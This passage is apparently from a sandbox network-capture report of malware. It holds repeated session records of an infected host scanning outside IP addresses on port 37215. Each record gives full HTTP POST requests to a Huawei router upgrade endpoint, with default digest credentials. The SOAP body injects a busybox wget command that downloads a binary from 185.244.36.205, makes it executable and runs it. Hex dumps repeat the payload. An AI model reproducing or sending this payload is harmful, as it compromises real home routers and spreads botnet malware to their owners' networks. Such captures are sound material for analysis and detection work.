                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              922192.168.2.1557768121.241.232.14137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539489985 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              923192.168.2.1541656138.236.162.13937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539490938 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              924192.168.2.1553184197.128.110.11537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539515018 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              925192.168.2.1552538181.76.25.16337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539514065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              926192.168.2.1547096181.82.69.4437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539551973 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              927192.168.2.1552092156.142.139.4237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539560080 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              928192.168.2.155718094.52.163.21737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539562941 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              929192.168.2.155708831.49.53.15437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539586067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              930192.168.2.155435441.112.211.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539623022 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              931192.168.2.1545080109.128.201.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539643049 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              932192.168.2.153516245.186.86.20937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539669037 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
